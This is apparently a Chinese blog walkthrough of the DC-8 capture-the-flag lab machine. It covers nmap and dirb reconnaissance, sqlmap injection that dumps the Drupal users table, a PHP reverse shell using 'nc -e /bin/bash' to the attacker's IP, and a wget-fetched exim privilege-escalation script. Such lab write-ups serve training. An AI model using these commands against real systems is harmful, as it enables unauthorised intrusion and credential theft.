DC-8详细渗透过程

1.靶机部署

kali安装:https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载:https://www.five86.com/downloads/DC-8.zip
解压后得到一个.ova的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

打开kali,为了便于操作,建议使用root用户登录kali。

2.1 IP扫描

使用nmap扫描同一个段内存活的IP,发现149开启了80端口,经过访问确实是我们的靶机!

nmap 192.168.11.0/24

image.png

2.2 其他信息收集

端口扫描:

nmap -A -T4 -p- 192.168.11.149

image.png
敏感目录扫描:

dirb http://192.168.11.149

image.png
指纹探测:
发现网站的CMS是Drupal
image.png

3.渗透过程

3.1 漏洞查找

访问页面,偶然发现,我们点击Details的内容,地址栏的nid会发生变化,推测这里是否存在SQL注入。
image.png
在nid参数后面加’,发现出现了报错:
image.png

3.2 SQL注入

使用sqlmap跑一下,爆一下数据库:
什么?看不懂命令??都到DC-8了你看不懂命令,建议回炉。

sqlmap -u “http://192.168.11.149/?nid=1” --level=5 --risk=3 --batch --current-db

image.png
爆出数据库之后再来爆一下表:

sqlmap -u “http://192.168.11.149/?nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -tables

image.png
有一堆表,优先选择敏感字段,爆一下users表里的字段:

sqlmap -u “http://192.168.11.149/?nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -T ‘users’ -columns

image.png
爆字段内容:

sqlmap -u “http://192.168.11.149/?nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -T ‘users’ -C’name,pass,uid’ -dump

image.png

3.3 解密

将我们得到的密码保存下来,Drupal的hash是经过特殊加密的,使用john进行爆破:

用户名:john
密码:turtle

image.png

3.4 登录网站

使用我们爆出来的用户名和密码登录网站:

登录地址:http://dc-8/user

image.png
导出搜寻一番,发现一处可以写PHP代码的地方:
image.png

3.5 反弹shell

写入反弹shell代码:
写好之后往下翻提交:

<?php
@exec("nc -e /bin/bash 192.168.11.128 4444");
?>

image.png
卡里端开启监听!!!
image.png
然后在找到这个页面,信息随便填,然后提交:
image.png
反弹shell成功:
image.png
生成可交互式shell:

python -c “import pty;pty.spawn(‘/bin/bash’)”

image.png

3.6 提权

查找一下SUID权限的二进制文件:

find / -perm -4000 -print 2>/dev/null

image.png
因为之前的DC靶机exim4提权都失败了,这里再试一下,先查看一下版本:

exim --version

image.png
查找一下漏洞:
为什么选这个,好歹打了这么多靶机了,自己悟!

searchsploit exim 4

image.png
复制文件:
image.png
然后将文件传输到靶机里面,我这里使用的是python开启ftp的方式:

python3 -m http.server 80

image.png
靶机端为了避免权限不足的问题,我们可以先进入tmp文件夹进行操作:

wget 192.168.11.128/hack.sh

image.png
赋予文件权限:

chmod +777 hack.sh

image.png
根据脚本提示,执行文件:

./hack.sh -m netcat

image.png

夺旗!!!

image.png

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值